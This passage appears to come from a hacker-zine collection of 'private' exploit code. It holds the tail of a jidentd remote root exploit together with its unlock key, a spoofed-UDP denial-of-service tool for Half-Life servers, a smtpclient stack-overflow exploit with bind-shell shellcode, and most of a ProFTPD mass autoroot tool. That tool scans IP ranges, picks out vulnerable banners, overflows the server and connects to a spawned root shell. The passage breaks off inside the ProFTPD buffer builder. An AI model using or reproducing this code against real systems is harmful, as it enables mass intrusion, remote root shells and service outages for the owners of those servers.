if(( strlen( current.host )) > 255 )
fprintf( stdout , "[-] Host string is too long\n" ) ,
do_exit( NULL , NULL , 0 );
if( current.port <= 0 )
fprintf( stdout , "[-] Invalid port\n" ) ,
do_exit( NULL , NULL , 0 );
if( current.retaddr <= 0 )
fprintf( stdout , "[-] Invalid return address\n" ) ,
do_exit( NULL , NULL , 0 );
return;
}
//////////////////////////////////////////////////////////////////////////////////////////////////
// Get the key for the exploit code. If you are reading this line then probably you have
// the key in the UHAGr-jidentd.key file
void get_key( void )
{
unsigned char buffer[5000] , output[SHA_DIGEST_LENGTH];
unsigned char key[] = "\xe7\x21\xe3\x5f\xe1\x82\xdd\x4c\xbf\x0a\x1e\x24\x31\x32\xa3\xe4\xa0\xd4\x80\x76";
fprintf( stdout , "Key required. This fuqn exploit is not encrypted or anything like this so \n"
"find a techniq to bypass this shit if you don't have the key. \n\n" );
fprintf( stdout , "%s:%d - Enter the key: " , __FILE__ , __LINE__ );
fflush( stdout );
bzero( buffer , sizeof( buffer ));
read( fileno( stdin ) , buffer , sizeof( buffer ) / 2 );
bzero( output , sizeof( output ));
SHA1( buffer , strlen( buffer ) , output );
// Check if the SHA1 digest is correct
if(( strcmp( key , output )) != 0 )
fprintf( stdout , "Erroneus key\n" ) ,
do_exit( NULL , NULL , 0 );
return;
}
//////////////////////////////////////////////////////////////////////////////////////////////////
int main( int argc , char *argv[] )
{
unsigned long int addr , startaddr , endaddr;
int fd;
#ifdef __KEY__
get_key();
#endif
if( argc < 3 )
print_usage( argv ) ,
do_exit( NULL , NULL , 0 );
fprintf( stdout , "\n\n" ); // lol ;-)
fprintf( stdout , "\tUHAGr CONFIDENTIAL EXPLOIT - DO NOT DISTRIBUTE !!! \n"
"\tBug discovery and exploitation code by hkvig \n"
"\tJidentd-1.0 and possibly others root exploit \n\n" );
fprintf( stdout , "[+] Parsing user supplied options\n" );
parse_options( argc , argv );
fprintf( stdout , "[+] Looking up host ip addr\n" );
addr = lookup_host( current.host );
sleep( 1 );
startaddr = current.retaddr;
endaddr = current.retaddr;
if( current.bruteforce != false )
startaddr -= 1024 ,
endaddr += 1024;
for( startaddr; startaddr <= endaddr; startaddr += 16 )
{
fprintf( stdout , "[+] Connecting to identd service\n" );
if(( fd = tcp_connect( addr , current.port )) == -1 )
do_exit( "tcp_connect()" , __FILE__ , __LINE__ );
sleep( 1 );
fprintf( stdout , "[+] Sending our exploitation buffer\n" );
do_bof( fd , startaddr , 2 );
sleep( 1 );
close( fd );
fprintf( stdout , "[+] Connecting to our shell\n" );
if(( fd = tcp_connect( addr , 2003 )) == -1 )
perror( "tcp_connect()" );
else
send( fd , FIRST , sizeof( FIRST ) , 0 ) ,
send( fd , SECOND , sizeof( SECOND ) , 0 ) ,
send( fd , THIRD , sizeof( THIRD ) , 0 ) ,
get_shell( fd ) ,
close( fd );
}
return 0;
}
$ cat UHAGr-jident.key
l33tppll33tf4d
==[4] m00-omfg-HL-again - lame DoS ===========================================
/*
* m00-HL-again.c
*
* Remote DoS exploit for ALL HalfLife server versions
* (without steam) includeing the patched one + IP spoofing support.
*
* Counter-Strike must die.
*
* d4rkgr3y / m00.0x333.org / m00@irc.blackhat.ru
*
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <stdio.h>
main(int argc,char **argv) {
int fd;
int i;
struct sockaddr sa;
struct sockaddr_in *p;
struct hostent *he;
u_char gram[]= {
0x45, 0x00, 0x00, 0x26,
0x12, 0x34, 0x00, 0x00,
0xFF, 0x11, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x12, 0x00, 0x00,
0xFF, 0xFF, 0xFF, 0xFF,
0x00, 0x00, 0x00, 0x00,
0x00
};
/* code ripped from my m00-cha0s.c */
/* im too lazy to code smth new */
printf("\nm00-HL-again.c ~ read the header bitch\nInternal m00 release. Do not distribute.\n\n");
if(argc!=5) { printf("Usage: %s <victim ip> <victim port> <source ip> <source port>\n\n",argv[0]); exit(1); }
if((he=gethostbyname(argv[3]))==NULL) {
perror("[-] gethostbyname() #1");
exit(0);
}
bcopy(*(he->h_addr_list),(gram+12),4);
printf("[*] Attacking host %s ... ",argv[1]);
if((he=gethostbyname(argv[1]))==NULL) {
perror("[-] gethostbyname() #2");
exit(0);
}
bcopy(*(he->h_addr_list),(gram+16),4);
*(u_short*)(gram+20)=htons((u_short)atoi(argv[4]));
*(u_short*)(gram+22)=htons((u_short)atoi(argv[2]));
p=(struct sockaddr_in*)&sa;
p->sin_family=AF_INET;
bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr));
if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1) {
perror("failed\n[-] socket()");
exit(0);
}
if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct sockaddr)))==-1) {
perror("failed\n[-] sendto()");
exit(0);
}
printf("done\n");
}
==[5] m00-smtpclame aka over_g masturbating again ============================
/*
*smtpclient/1.0.0 lame remote exploit
*keep it private ;) hehehe
*
*vuln in smtpclient_main.c:
*
*char buf[1024];
*[...........]
* va_start(ap, str);
* vsprintf(buf, str, ap);
*
*smtpclient 1.0.0 in bsd ports not vuln:
*vsnprintf(buf, 1024, str, ap);
*
*its simple stack overflow, size of str not contolled
*and we may overwrite eip.
*
*over_g / m00.ru - 15 jule 04
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdio.h>
//shellcodes by eSDee of Netric
char linuxshellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
"\x89\xc1\x31\xc0\x31\xdb\x50\x50"
"\x50\x66\x68\xef\x10\xb3\x02\x66"
"\x53\x89\xe2\xb3\x10\x53\xb3\x02"
"\x52\x51\x89\xca\x89\xe1\xb0\x66"
"\xcd\x80\x31\xdb\x39\xc3\x74\x05"
"\x31\xc0\x40\xcd\x80\x31\xc0\x50"
"\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
"\x80\x89\xd7\x31\xc0\x31\xdb\x31"
"\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
"\x80\x31\xc0\x31\xdb\x50\x50\x57"
"\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
"\x89\xc6\x31\xc0\x31\xdb\xb0\x02"
"\xcd\x80\x39\xc3\x75\x40\x31\xc0"
"\x89\xfb\xb0\x06\xcd\x80\x31\xc0"
"\x31\xc9\x89\xf3\xb0\x3e\xfe\xc0\xcd\x80"
"\x31\xc0\x41\xb0\x3e\xfe\xc0\xcd\x80\x31"
"\xc0\x41\xb0\x3e\xfe\xc0\xcd\x80\x31\xc0"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x8b\x54\x24"
"\x08\x50\x53\x89\xe1\xb0\x0b\xcd"
"\x80\x31\xc0\x40\xcd\x80\x31\xc0"
"\x89\xf3\xb0\x06\xcd\x80\xeb\x99";
struct {
char *namever;
long ret;
int pos;
}
trgtz[]= {
{"gentoo 1.4.3", 0xbfff9ccc, 1014 }, //usr/portage/net-mail/smtpclient
{"fedore core 1", 0xbfff9aab, 1014 },
{"denial-of-service", 0x42424242, 1014 },
{ NULL , 0x0 },};
void usage(char *prg)
{
int i;
printf("usage %s <target> \n targets:\n",prg);
for (i=0;i<=2;i++) printf(" %d. %s\n",i,trgtz[i]);
printf("\n");
exit(-1);
}
int get_shell(char *ip, unsigned short port) {
fd_set rfds;
int retVal,r;
char buf[8096];
int sockfd;
struct hostent *hs;
struct sockaddr_in sock;
bzero(&sock, sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if ((sock.sin_addr.s_addr = inet_addr(ip)) == -1) {
if ((hs = gethostbyname(ip)) == NULL)
{ printf(" failed\n\n");
return -1; }
sock.sin_family = hs->h_addrtype;
memcpy((caddr_t)&sock.sin_addr.s_addr, hs->h_addr, hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{ printf(" failed\n\n");
return -1; }
if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0)
{ printf(" failed\n\n");
return -1; }
printf("ok\n\n");
send(sockfd,"id;uname -a;\n",13,0);
do {
FD_ZERO(&rfds);
FD_SET(0, &rfds);
FD_SET(sockfd, &rfds);
retVal = select(sockfd+1, &rfds, NULL, NULL, NULL);
if(retVal) {
if(FD_ISSET(sockfd, &rfds)) {
buf[(r=recv(sockfd, buf, 8095,0))] = '\0';
printf("%s", buf);
}
if(FD_ISSET(0, &rfds)) {
buf[(r=read(0, buf, 8095))]='\0';
send(sockfd, buf, strlen(buf), 0);
}
}
} while(retVal && r);
close(sockfd);
return 1;
}
int main(int argc, char *argv[])
{
int port = 25; // need root )
char get[501];
char buf[1201];
char mbuf[1201];
char *client;
struct sockaddr_in mysock;
struct sockaddr_in lameclient;
int sockfd,csockfd,saddrlen,msaddrlen;
int target = 0;
printf("\n m00-smtpclame.c - lame remote exploit for smtpclient-1.0.0\n");
printf(" by over_g / m00.ru\n\n");
if (argc<2) usage(argv[0]);
if (atoi(argv[1])<3) target = atoi(argv[1]);
printf("[+] binding fake server on port %d\n",port);
if ((sockfd = socket(AF_INET,SOCK_STREAM,0)) < 0) {
printf("[-] couldnt create socket\n\n");
exit(-1);
}
mysock.sin_addr.s_addr = INADDR_ANY;
mysock.sin_port = htons(port);
mysock.sin_family = AF_INET;
if (bind(sockfd, (struct sockaddr *)&mysock,sizeof(mysock)) < 0) {
printf("[-] couldnt bind()\n\n");
exit(-1);
}
if (listen(sockfd,128) < 0 ) {
printf("[-] couldnt listen()\n\n");
exit(-1);
}
msaddrlen = sizeof(lameclient);
printf("[+] using target %d - %s\n[+] ok, waiting for connection\n",target, trgtz[target].namever);
csockfd = accept(sockfd,(struct sockaddr *)&lameclient,&msaddrlen);
client = inet_ntoa(lameclient.sin_addr);
printf("[+] ok, connection from %s\n", client);
send(csockfd,"220 HI MAN\n",11,0);
printf("220 HI MAN\n");
recv(csockfd,get,500,0);
printf(get);
printf("[+] sending exploit... ");
memset(buf,0x90,1200);
memcpy(&buf[1000-strlen(linuxshellcode)], linuxshellcode,strlen(linuxshellcode));
memcpy(&buf[trgtz[target].pos],(char *)&trgtz[target].ret,4);
sprintf(mbuf,"534 %s\n\n",buf);
send(csockfd,mbuf,strlen(mbuf),0);
close(sockfd);
printf("ok\n[+] Connecting to shell...");
sleep(3);
get_shell(client,61200);
}
/* da blya, ya znau 4to etot exploit nikomy ne nyzen, vot i ne pizdite,
ya vse eto delau dlya sebya, zaebali nax*/
==[6] m00 jihad proftpd_put_down2 mass-r00ter!!! =============================
/* proftpd_put_down2~m00.c
*
* ProFTPD 1.2.7 - 1.2.9rc2 mass autoroot exploit v1.5
* by m00 Security // m00.void.ru
*
* Zero-day version of proftpd_put_down.c by Haggis
*
* History:
* - ISS X-Force posted information about "ProFTPD
* ASCII File Remote Compromise Vulnerability" [24/9/2003]
* - ProFTPd remote root exploit by bkbll [7/10/2003]
* - More powerful proftpd_put_down.c by Haggis [14/10/2003]
* - mass proftd_put_down2~m00.c exploit by m00 Security
* [01/11/2003]
*
* Added:
* - ip-range scanner with banner grabber
* - Slackware9.0 target
* - portbind shellcode from netric
*
* Tested on:
* - SuSE 8.0, 8.1 stack - 0xbffff2xx
* - RedHat 7.2/8.0 stack - 0xbfffe8xx
* - Slack 9.0 stack - 0xbffff6xx
*
* Greetz:
* - nerF security team // www.nerf.ru
* - Limpid Byte // lbyte.sysdrop.org
* - priv8security // www.priv8security.com
* - UHAGr // www.uhagr.org
* - and other ppl from #m00sec and #nerf (EFnet) that
* we like and respect.
*
* Authors:
* rash [rashray@inbox.ru]
* d4rkgr3y [d4rk@securitylab.ru]
* over_g [overg@mail.ru]
*
* THIS IS UNPUBLISHED m00 EXPLOIT CODE
* KEEP IT PRIVATE
*/
#include <stdio.h>
#include <ctype.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <time.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <stdarg.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/tcp.h>
/* dont change anything here */
#define _u32 unsigned int
#define CLSD 0 //CLOSED
#define READY 1 //READY to work
#define CNTG 2 //CONNECTING
/* end */
#define PAUSE 100 //ms to w8 after each loop
#define TIMEOUT 3
#define STACK_START0xbfffe704
#define STACK_END0xbffff704
#define FTP_PORT21
#define BINDSHELL_PORT26112
#define SIZE1024
#define EXPLOIT_BUF_SIZE65535
#define FAILURE-1
#define SUCCESS0
#define NORMAL_DOWNLOAD1
#define EXPLOIT_DOWNLOAD2
#define DOWNLOAD3
#define UPLOAD4
#define ACCEPT_TIMEOUT5
#define SLEEP_DELAY19999999
char shellcode[] =
// we have changed bindshell shellcode to this one cuz
// Haggis's doesnt work correctly :\
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\x52\x50"
"\xcd\x80\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\x52\x50"
"\xb0\x66\xcd\x80\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66"
"\xcd\x80\x89\xd9\x93\xb0\x3f\xcd\x80\x49\x79\xf9\x52\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0"
"\x0b\xcd\x80";
typedef struct {
int s;
_u32 state;
_u32 addr;
_u32 tmst;
} s_struct;
static s_struct *s;
static _u32 count;
static _u32 run = 0;
static _u32 i,j,k;
static long on = 1;
static long off = 0;
char recvBuf[0x64];
int attemptNumberZzz = 0;
int bfcount;
int dontExp = 0;
int dontConnectToShell = 0;
int naive = 0;
int ok = 0;
int defaultAcc = 1;
int verbose = 0;
int sleepMode = 0;
int controlSock, passiveSock;
int currentPassivePort=32769;
int currentServerPort=31337;
int exploitBufLen;
int attemptNumber=0;
int ftpPort=FTP_PORT;
_u32 stackWriteAddr, retAddr;
_u32 stackStartAddr=STACK_START;
_u32 stackSavedStartAddr;
char serverBuf[SIZE];
char exploitBuf[EXPLOIT_BUF_SIZE];
char uploadPath[SIZE]="";
char filename[SIZE*2];
char *server=NULL;
char *user;
char *pass;
char *localIP=NULL;
char errorBuf[SIZE];
int connect_to_server(int port);
int login_to_server();
int set_passive_mode(int mode);
int set_ascii_mode();
int set_path_and_filename();
int check_for_linefeed();
int check_status();
int create_passive_server();
int create_exploit_buffer();
int upload_file();
int download_file(int mode);
void usage(char *s);
int do_remote_shell(int shellSock);
void status_bar(char *info);
int timeout_accept(int s, struct sockaddr *sa, int *f);
void my_send(int s, char *b, ...);
void my_recv(int s);
void my_sleep(int n);
int doris_chroot_breaker();
void surprise();
void flush_this_shit();
int main(int argc,char **argv)
{
struct in_addr inaddr;
struct sockaddr_in dst;
struct timeval tv = {0,0};
_u32 stackStartAddr=STACK_START;
_u32 start; // start ip
_u32 end; // end ip
_u32 left;
_u32 timeout;
_u32 pause;
_u32 ex;
_u32 any;
_u32 *con; // massive with IPs of alive ftp daemons
_u32 index; // count of sucessfully connections
_u32 vuln; // count of vulnerable ftp daemons
char **bfuser;
char **bfpasswd;
char c;
fd_set fdset;
signal(SIGPIPE, SIG_IGN); // "broken pipe" ignoring
signal(SIGQUIT, &surprise); // catching CTRL+C (2) and
signal(SIGINT, &surprise); // quit-signal (0) to kill all opened sockets
pause = PAUSE;
timeout = TIMEOUT;
printf("\n@----------------------------------------------@\n");
printf(" ProFTPD 1.2.7 - 1.2.9rc2 remote r00t exploit\n");
printf(" by Haggis (haggis@haggis.kicks-ass.net)\n\n");
printf(" m00 EDITION\n\n");
printf(" PRIVATE!!! DO NOT DISTRIBUTE!!!\n");
printf("@----------------------------------------------@\n\n");
if(argc<2) usage(argv[0]);
while((c = getopt(argc, argv, "vc:nt:u:p:l:mU:s:e:P:S:"))!= EOF) {
switch (c) {
case 'v':
verbose=1;
break;
case 'c':
count=atoi(optarg);
break;
case 'n':
naive = 1;
break;
case 't':
timeout=atoi(optarg);
break;
case 'u':
user=optarg;
defaultAcc = 0;
break;
case 'p':
pass=optarg;
break;
case 'l':
localIP=optarg;
break;
case 's':
start = inet_addr(optarg);
break;
case 'e':
end = inet_addr(optarg);
break;
case 'm':
dontConnectToShell = 1;
break;
case 'U':
strncpy(uploadPath,optarg,SIZE);
break;
case 'P':
ftpPort=atoi(optarg);
break;
case 'S':
stackStartAddr=strtoul(optarg, NULL, 16);
break;
default:
usage(argv[0]);
return 1;
}
}
if(localIP==NULL) {
usage(argv[0]);
}
if(start == -1) {
printf("[-] Bad <start_ip>. Exiting..\n");
return 1;
}
if(end == -1) {
printf("[-] Bad <end_ip>. Exiting.. \n");
return 1;
}
if(count == 0) count = 30;
/* VERY FAST IP-RANGE SCANNER WITH NON-BLOCK SOCKETS + BANNER GRABBER */
s = (s_struct *)malloc(count*sizeof(s_struct));
memset(s,0,count*sizeof(s_struct));
FD_ZERO(&fdset);
ex = 0;
left = htonl(end)-htonl(start)+1;
con = (_u32 *) malloc(left*sizeof(_u32));
memset(con,0,left*sizeof(_u32));
index = 0;
vuln = 0;
stackSavedStartAddr = stackStartAddr;
memset(&dst,0,sizeof(dst));
dst.sin_addr.s_addr = start;
dst.sin_port = htons(ftpPort);
dst.sin_family = AF_INET;
run = 1;
usleep(10);
while(!ex) {
for(i=0;(i<count) && left;i++) {
if(s[i].state == CLSD) {
s[i].s = socket(AF_INET,SOCK_STREAM,0);
if(s[i].s > 0) {
fcntl(s[i].s,F_SETFL,O_NONBLOCK);
s[i].state = READY;
flush_this_shit();
}
}
if(s[i].state == READY){
connect(s[i].s,(struct sockaddr*)&dst,sizeof(dst));
s[i].state = CNTG;
s[i].addr = dst.sin_addr.s_addr;
s[i].tmst = time(NULL);
dst.sin_addr.s_addr=htonl(ntohl(dst.sin_addr.s_addr)+1);
left--;
}
}
FD_ZERO(&fdset);
for(i=0;i<count;i++)
if(s[i].state == CNTG)
FD_SET(s[i].s,&fdset);
select(FD_SETSIZE,NULL,&fdset,NULL,&tv);
for(i=0;i<count;i++) {
if(FD_ISSET(s[i].s,&fdset)) {
fcntl(s[i].s,F_SETFL,O_RDWR);
// if it's possible to send something => tcp connection established.
if (!(send(s[i].s, "!", 2 , 0)<0)){
inaddr.s_addr = s[i].addr;
recv(s[i].s,recvBuf,0x64,0);
if(verbose) printf("[+] Connected to [%s:%d]:\n=> %s\n",inet_ntoa(inaddr),ftpPort,recvBuf);
// vulnerable proftpd versions (without "rc*" shit). I forgot something?
if(strstr(recvBuf,"ProFTPD") && (strstr(recvBuf,"1.2.7") || strstr(recvBuf,"1.2.8") || strstr(recvBuf,"1.2.9"))) {
*(_u32 *) (con+vuln*sizeof(_u32)) = s[i].addr;
vuln++;
}
index++;
}
close(s[i].s);
s[i].state = CLSD;
}
}
FD_ZERO(&fdset);
for(i=0;i<count;i++) {
if(s[i].state == CNTG) {
if((time(NULL)-s[i].tmst)>timeout) {
fcntl(s[i].s,F_SETFL,O_RDWR);
close(s[i].s);
s[i].state = CLSD;
inaddr.s_addr = s[i].addr;
} else FD_SET(s[i].s,&fdset);
}
}
select(FD_SETSIZE,NULL,NULL,&fdset,&tv);
for(i=0;i<count;i++) {
if(FD_ISSET(s[i].s,&fdset)) {
fcntl(s[i].s,F_SETFL,O_RDWR);
close(s[i].s);
s[i].state = CLSD;
inaddr.s_addr = s[i].addr;
}
}
if (!left) {
any=0;
for (i=0;i<count;i++) {
if (s[i].state != CLSD) any=1;
if (!any) ex = 1;
}
}
usleep(pause*1000);
} // while(!ex)
/* E N D */
if(naive) vuln = index; // if naive mode turned ON (-n)
printf("[+] Scanning complete\n[~] [%i] ftp daemons found\n[~] [%i] are vulnerable\n",index,vuln);
if(!vuln) {
printf("[-] Nothing to exploit. Exiting...\n");
return 1;
}
/*
for (i=0;i<vuln;i++){
inaddr.s_addr = *(_u32 *)(con+i*sizeof(_u32));
printf("[%s:%d]\n",inet_ntoa(inaddr), ftpPort);
}
*/
for (i=0;i<vuln;i++){
/* cleaning some shit after last attempt */
stackStartAddr = stackSavedStartAddr;
attemptNumber = 0;
/* ok */
inaddr.s_addr = *(_u32 *)(con+i*sizeof(_u32));
printf("\n[~] Attempting to exploit [%s:%d]\n",inet_ntoa(inaddr), ftpPort);
server = inet_ntoa(inaddr);
/* SIMPLE FTP PASSWORD BRUTEFORCER */
if(defaultAcc) {
user = "anonymous";
pass = "ftp@m00.void.ru";
// pretty good work on Mandrake9.1.
// But on other system (rh7.3) segfault. I dont know why...
// If u use it under Mandrake, cut it from comments
/*
printf("[~] Trying to guess FTP server login/password\n");
dontExp = 1;
bfuser[0] = "anonymous";
bfpasswd[0] = "ftp@m00.void.ru";
bfuser[1] = "ftp";
bfpasswd[1] = "ftp";
bfuser[2] = "guest";
bfpasswd[2] = "guest";
bfcount = 2;
for(k=0;k<=bfcount;k++) {
user = bfuser[k];
pass = bfpasswd[k];
printf("=> User: %s | Pass: %s | Result: ",user,pass);
if((controlSock=connect_to_server(ftpPort))==FAILURE) {
perror("\n[-] Connection problems");
goto m00;
}
if(login_to_server()!=FAILURE) {
printf("access granded\n");
k=4;
} else printf("access denied\n");
close(controlSock);
}
if(k==3) {
printf("[-] We have no access to [%s:%d] ftpd. Try to get it manualy\n",inet_ntoa(inaddr), ftpPort);
goto err;
}
dontExp = 0;
*/
}
doris_chroot_breaker();
for(stackWriteAddr=stackStartAddr; stackWriteAddr<STACK_END; stackWriteAddr+=4, attemptNumber++) {
if(check_for_linefeed()==FAILURE) {
continue;
}
retAddr=stackWriteAddr+200; // good enough for show business
if((controlSock=connect_to_server(ftpPort))==FAILURE) {
perror("\n\n[-] Failing to connect to remote host\n");
goto m00;
}
if(login_to_server()==FAILURE) {
close(controlSock);
printf("\n[-] Login failed.\n");
goto m00;
}
if(set_passive_mode(UPLOAD)==FAILURE)
goto err;
if(set_ascii_mode()==FAILURE)
goto err;
if(set_path_and_filename()==FAILURE)
goto err;
// create the buffer containing RET for this
// brute-force iteration
create_exploit_buffer();
if(upload_file()==FAILURE) {
printf("\n[-] You have no write access on this ftp daemon (try to find \"upload\" directory manualy)\n");
goto m00;
}
close(controlSock);
// Connect again, then login, set ASCII mode and download the exploit file.
// This will trigger the overflow; as a result, we've
// corrupted the memory pool of this session and when we
// download the file again, the stack area will be overwritten
// and we control the saved EIP.
if((controlSock=connect_to_server(ftpPort))<0) {
perror("\n[-] Failed to connect to remote host\n");
goto m00;
}
login_to_server(user,pass);
set_path_and_filename();
if(set_ascii_mode()==FAILURE)
goto err;
if(set_passive_mode(DOWNLOAD)==FAILURE)
goto err;
if(sleepMode)
sleep(10);
if(download_file(NORMAL_DOWNLOAD)==FAILURE)
goto err;
// Finally, read the file again. This will trigger the stack
// overwrite (NOT the overflow, that happened earlier). We could
// control EIP at this point and r00t may be only heartbeat away...
if(set_passive_mode(DOWNLOAD)==FAILURE)
goto err;
if(download_file(EXPLOIT_DOWNLOAD)==FAILURE)
goto err;
err:
close(controlSock);
}
m00:
// This is only reached if the bruteforce fails.
// delete the exploit files here
printf("[-] Exploitation failure.\n");
}
}
void status_bar(char *info) {
printf("[ %20s ]-[ Stack: 0x%08x ]-[ RET: 0x%08x ]\r",info, stackWriteAddr,retAddr);
fflush(stdout);
}
void flush_this_shit() {
attemptNumberZzz++;
printf("[~] Scanning ip-range: %i\r",attemptNumberZzz);
fflush(stdout);
}
int set_path_and_filename()
{
status_bar("Setting filename");
if(strcmp(uploadPath,"")) {
my_send(controlSock, "CWD %s\r\n",uploadPath);
my_recv(controlSock);
}
snprintf(filename,SIZE,"proft_put_down-%d-%d.txt",getpid(),attemptNumber);
return SUCCESS;
}
int download_file(int mode)
{
int len, localServerSock, dataSock, bindShellSock;
struct sockaddr_in localServer;
status_bar("Downloading");
// Ask the victim server to send us the exploit file
my_send(controlSock, "RETR %s\r\n", filename);
// Create a listening server on our passive port to
// receive the data
memset(&localServer,0,sizeof(localServer));
localServerSock=create_passive_server();
len=sizeof(localServer);
// Wait for a few seconds for the victim server to contact us...
if((dataSock=timeout_accept(localServerSock,(struct sockaddr *)&localServer,&len))<0) {
close(localServerSock);
return FAILURE;
}
// If the mode is EXPLOIT_DOWNLOAD, then this is the
// second attempt at downloading... that means we might
// have a shell waiting for us on the victim server, so
// we try to connect to it
if(mode==EXPLOIT_DOWNLOAD) {
if((bindShellSock=connect_to_server(BINDSHELL_PORT))>=0) {
printf("\n[+] Shell spawned on port 26112! w00t!\n");
if(!dontConnectToShell) { // "-m" option
my_send(bindShellSock,"uname -a;id;\n",13);
do_remote_shell(bindShellSock);
}
return 1;
}
close(dataSock);
close(localServerSock);
return SUCCESS;
}
// If the mode is NORMAL_DOWNLOAD, then just clean up the
// connection by receiving the file from the server; closing
// the data and local server sockets, then read the confirmation
// message from the control socket
my_recv(dataSock);
close(dataSock);
close(localServerSock);
my_recv(controlSock);
return check_status();
}
int timeout_accept(int s, struct sockaddr *sa, int *f)
{
fd_set fdset;
struct timeval timeout = { ACCEPT_TIMEOUT, 0 }; // seconds
int result;
if(s<=0)
return FAILURE;
FD_ZERO(&fdset);
FD_SET(s, &fdset);
if((result=select(s+1, &fdset, 0, 0, &timeout))==0)
return FAILURE;
return accept(s,sa,f);
}
int set_passive_mode(int mode)
{
int portMSB, portLSB;
int x1,x2,x3,x4;
char *ptr=localIP, *start;
status_bar("Setting passive");
if(mode==DOWNLOAD) {
if((++currentPassivePort) > 35000)
currentPassivePort=32789;
while(*(++ptr))
if(*ptr=='.')
*ptr=',';
portMSB=(currentPassivePort >> 8 ) & 0xff;
portLSB=currentPassivePort & 0xff;
my_send(controlSock, "PORT %s,%d,%d\r\n", localIP, portMSB, portLSB);
my_recv(controlSock);
return check_status();
} else {
my_send(controlSock, "PASV\r\n");
my_recv(controlSock);
if(check_status()==FAILURE)
return FAILURE;
ptr=serverBuf;
while(*ptr && *ptr!='(')
ptr++;
if(*ptr=='\0')
return FAILURE;
start=ptr+1;
while(*ptr && *ptr!=')')
ptr++;
*ptr=0;
sscanf(start, "%d,%d,%d,%d,%d,%d",&x1, &x2, &x3, &x4, &portMSB, &portLSB);
currentServerPort=(portMSB << 8) | portLSB;
}
return SUCCESS;
}
int connect_to_server(int port)
{
struct sockaddr_in serverAddr;
struct hostent *host;
int sock, tmp=1;
if(!dontExp) status_bar("Connecting");
if((host=gethostbyname(server))==NULL)
return FAILURE;
if((sock=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP))<0)
return FAILURE;
bzero(&serverAddr,sizeof(struct sockaddr));
serverAddr.sin_family=AF_INET;
serverAddr.sin_port=htons(port);
serverAddr.sin_addr=*((struct in_addr *)host->h_addr);
setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (void *)&tmp, sizeof(tmp));
if(connect(sock,(struct sockaddr *)&serverAddr,sizeof(struct sockaddr))<0) {
close(sock);
return FAILURE;
}
return sock;
}
int check_status()
{
if(isdigit(serverBuf[0]) && serverBuf[0]!='5')
return SUCCESS;
else
return FAILURE;
}
int login_to_server()
{
if(!dontExp) status_bar("Logging in");
my_recv(controlSock);
my_send(controlSock, "USER %s\r\n", user);
my_recv(controlSock);
if(check_status()==FAILURE)
return FAILURE;
my_send(controlSock, "PASS %s\r\n", pass);
my_recv(controlSock);
return check_status();
}
int set_ascii_mode()
{
status_bar("Setting ASCII mode");
my_send(controlSock, "TYPE A\r\n");
my_recv(controlSock);
return check_status();
}
int upload_file()
{
int dataSock;
status_bar("Uploading file");
// open up the data channel
if((dataSock=connect_to_server(currentServerPort))==FAILURE)
return FAILURE;
// tell server we're gonna send some shiznitz
my_send(controlSock, "STOR %s\r\n", filename);
my_recv(controlSock);
if(check_status()==FAILURE) {
close(dataSock);
return FAILURE;
}
// send the exploit file to the victim server
send(dataSock, exploitBuf, exploitBufLen, 0);
close(dataSock);
// make sure all went well
my_recv(controlSock);
if(check_status()==FAILURE)
return FAILURE;
return SUCCESS;
}
int create_exploit_buffer()
{
int i;
char buf[41];
unsigned int writeaddr=stackWriteAddr;
unsigned int *ptr=(unsigned int *)(exploitBuf+3);
unsigned int dummy=0x11111111;
FILE *fp;
status_bar("Make exploit buf");
exploitBufLen=1024;
memset(exploitBuf,0,EXPLOIT_BUF_SIZE);
memset(exploitBuf,0x90,512);
*(ptr++)=writeaddr+28;
for(i=0;i<6;i++)
*(ptr++)=retAddr;
*(ptr++)=0;
for(i=0;i<2;i++)
*(ptr++)=retAddr;
memcpy(exploitBuf+512-strlen(shellcode)-1,shellcode,strlen(shellcode));
memset(exploitBuf+512,'\n',512);
for(i=0;i<96;i++) {
memset(buf,0,41);
if(dummy==0x1111112e)
// this sets session.d->outstrm to NULL which forces an early return
// avoids crashing proftpd... on SuSE 8.0 anywayz...
memcpy(buf,"\n\n\n\n\n\n\n\n\x00\x00\x00\x00\n\n\n\n\n\n\n\n",20);
else if(dummy==0x11111166)
// this is the same thing tailored for RH7.2
memcpy(buf,"\n\n\n\n\n\n\n\n\x72\x00\x00\x00\x00\n\n\n\n\n\n\n",20);
else
memset(buf,'\n',20);
// i used these dummy values to find the correct spot for
// the session.d->outstrm pointer
*(unsigned int *)(buf+20)=dummy;
*(unsigned int *)(buf+24)=dummy;
